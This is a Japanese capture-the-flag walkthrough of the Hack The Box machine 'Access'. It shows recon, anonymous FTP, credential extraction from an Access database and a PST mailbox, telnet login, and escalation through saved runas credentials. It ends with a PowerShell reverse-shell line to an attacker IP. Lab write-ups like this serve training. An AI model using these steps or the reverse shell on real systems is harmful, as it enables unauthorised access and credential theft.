目次
偵察
nmapでスキャンします。
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 425 Cannot open data connection. 23/tcp open telnet syn-ack ttl 127 Microsoft Windows XP telnetd | telnet-ntlm-info: | Target_Name: ACCESS | NetBIOS_Domain_Name: ACCESS | NetBIOS_Computer_Name: ACCESS | DNS_Domain_Name: ACCESS | DNS_Computer_Name: ACCESS |_ Product_Version: 6.1.7600 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 |_http-title: MegaCorp | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE
FTPは匿名アクセスが可能です。
┌──(kali㉿kali)-[~/htb/access] └─$ ftp ftp> open (to) 10.129.4.14 Connected to 10.129.4.14. 220 Microsoft FTP Service Name (10.129.4.14:kali): Anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 425 Cannot open data connection. 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM Backups 08-24-18 09:00PM Engineer 226 Transfer complete.
2つのディレクトリを確認できます。
Backupsからはbackup.mdb、EngineerからはAccess Control.zipをダウンロードできます。
ダウンロードをする際はbinaryモードで行います。
ftp> passive off Passive mode: off; fallback to active mode: off. ftp> binary 200 Type set to I. ftp> cd Engineer 250 CWD command successful. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-24-18 12:16AM 10870 Access Control.zip 226 Transfer complete. ftp> get Access\ Control.zip local: Access Control.zip remote: Access Control.zip 200 PORT command successful. 125 Data connection already open; Transfer starting. 100% |*****************************************************************************************************************************************************************| 10870 19.59 KiB/s 00:00 ETA 226 Transfer complete. 10870 bytes received in 00:00 (19.55 KiB/s) ftp>
Backup.mdbの調査
mdbに含まれるテーブルを確認します。
┌──(kali㉿kali)-[~/htb/access] └─$ mdb-tables backup.mdb -1 acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group
---snip---
テーブルをcsvにエクスポートします。
┌──(kali㉿kali)-[~/htb/access]
└─$ for t in $(mdb-tables -1 backup.mdb); do
mdb-export ./backup.mdb "$t" > "${t}.csv"
done
csvの中から認証情報が含まれてそうなファイルを探します。
auth_userよりパスワードが確認できます。
┌──(kali㉿kali)-[~/htb/access/mdb]
└─$ grep -iE (pass| pwd | token| secret| api| login| user) *.csv
Machines.csv:ID,ConnectType,IP,SerialPort,Port,Baudrate,MachineNumber,IsHost,Enabled,CommPassword,UILanguage,DateFormat,InOutRecordWarn,Idle,Voice,managercount,fingercount,SecretCount,ProductType,LockControl,Purpose,ProduceKind,sn,PhotoStamp,IsIfChangeConfigServer2,pushver,change_operator,change_time,create_operator,create_time,delete_operator,delete_time,status,device_type,last_activity,trans_times,TransInterval,log_stamp,oplog_stamp,photo_stamp,UpdateDB,device_name,transaction_count,main_time,max_user_count,max_finger_count,max_attlog_count,alg_ver,flash_size,free_flash_size,language,lng_encode,volume,is_tft,platform,brightness,oem_vendor,city,AccFun,TZAdj,comm_type,agent_ipaddress,subnet_mask,gateway,area_id,acpanel_type,sync_time,four_to_two,video_login,fp_mthreshold,Fpversion,max_comm_size,max_comm_count,realtime,delay,encrypt,dstime_id,door_count,reader_count,aux_in_count,aux_out_count,IsOnlyRFMachine,alias,ipaddress,com_port,com_address,DeviceNetmask,DeviceGetway,SimpleEventType,FvFunOn,fvcount,deviceOption,DevSDKType,UTableDesc,IsTFTMachine,PinWidth,UserExtFmt,FP1_NThreshold,FP1_1Threshold,Face1_NThreshold,Face1_1Threshold,Only1_1Mode,OnlyCheckCard,MifireMustRegistered,RFCardOn,Mifire,MifireId,NetOn,RS232On,RS485On,FreeType,FreeTime,NoDisplayFun,VoiceTipsOn,TOMenu,StdVolume,VRYVH,KeyPadBeep,BatchUpdate,CardFun,FaceFunOn,FaceCount,TimeAPBFunOn,FirmwareVersion,FingerFunOn,CompatOldFirmware,ParamValues,WirelessSSID,WirelessKey,WirelessAddr,WirelessMask,WirelessGateWay,IsWireless,ACFun,BiometricType,BiometricVersion,BiometricMaxCount,BiometricUsedCount,WIFI,WIFIOn,WIFIDHCP,MachineAlias,usercount
USERINFO.csv:USERID,Badgenumber,SSN,Gender,TITLE,PAGER,BIRTHDAY,HIREDDAY,street,CITY,STATE,ZIP,OPHONE,FPHONE,VERIFICATIONMETHOD,DEFAULTDEPTID,SECURITYFLAGS,ATT,INLATE,OUTEARLY,OVERTIME,SEP,HOLIDAY,MINZU,PASSWORD,LUNCHDURATION,PHOTO,mverifypass,Notes,privilege,InheritDeptSch,InheritDeptSchClass,AutoSchPlan,MinAutoSchInterval,RegisterOT,InheritDeptRule,EMPRIVILEGE,CardNo,change_operator,change_time,create_operator,create_time,delete_operator,delete_time,status,lastname,AccGroup,TimeZones,identitycard,UTime,Education,OffDuty,DelTag,morecard_group_id,set_valid_time,acc_startdate,acc_enddate,birthplace,Political,contry,hiretype,email,firedate,isatt,homeaddress,emptype,bankcode1,bankcode2,isblacklist,Iuser1,Iuser2,Iuser3,Iuser4,Iuser5,Cuser1,Cuser2,Cuser3,Cuser4,Cuser5,Duser1,Duser2,Duser3,Duser4,Duser5,reserve,name,OfflineBeginDate,OfflineEndDate,carNo,carType,carBrand,carColor
auth_user.csv:id,username,password,Status,last_login,RoleID,Remark
export_table.csv:acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
┌──(kali㉿kali)-[~/htb/access/mdb]
└─$ cat auth_user.csv
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
Access Control.zipの調査
取得したパスワードを使ってzipファイルを展開します。
7z x Access\ Control.zip
Access Contorol.pstファイルが確認できます。pstファイルの中にsecurityの認証情報が確認できます。
┌──(kali㉿kali)-[~/htb/access]
└─$ readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
┌──(kali㉿kali)-[~/htb/access]
└─$ ls
'Access Control.mbox' 'Access Control.pst' 'Access Control.zip' backup.mdb mdb nmap.txt reports rustscan.txt udpnmap-p.txt
┌──(kali㉿kali)-[~/htb/access]
└─$ cat Access\ Control.mbox
From "john@megacorp.com" Fri Aug 24 08:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-1378250037_-_-"
----boundary-LibPST-iamunique-1378250037_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-1378250037_-_-"
--alt---boundary-LibPST-iamunique-1378250037_-_-
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
user.txt取得
securityの認証情報でtelnetするとuser.txtが取得できます。
┌──(kali㉿kali)-[~/htb/access] └─$ telnet 10.129.4.14 Trying 10.129.4.14... Connected to 10.129.4.14. Escape character is '^]'. Welcome to Microsoft Telnet Service login: security password: *=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\security>
権限昇格
c:\Users\Public\DesktopにZKAccess3.5 Security System.lnkがあります。
中にはAdministratorという文字列が確認できます。
C:\Users\Public\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Public\Desktop
08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
1 File(s) 1,870 bytes
0 Dir(s) 3,350,327,296 bytes free
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows���:�▒M�:*wWindowsV1MV�System32���:�▒MV�*�System32▒X2P�:�
runas.exe���:1��:1�*Yrunas.exe▒L-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
�wN�▒�]N�D.��Q���`�Xaccess�_���8{E�3
O�j)�H���
)ΰ[�_���8{E�3
O�j)�H���
)ΰ[� ��1SPS��XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500
C:\Users\Public\Desktop>
runas savecredで検索すると以下のような情報が見つかります。
runasは通常は実行時にパスワードが求められますが、「/savecred」オプションを指定して実行すると、資格情報マネージャーに保存されたパスワードを参照し、パスワードを求められずにコマンドを実行できます。
cmdkey /listを実行すると実際にAdministratorの資格情報が保存されていることが確認できます。
Invoke-PowerShellTCP.ps1の末尾に以下の内容を追記して実行するとリバースシェルが取得できます。
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.223 -Port 1234
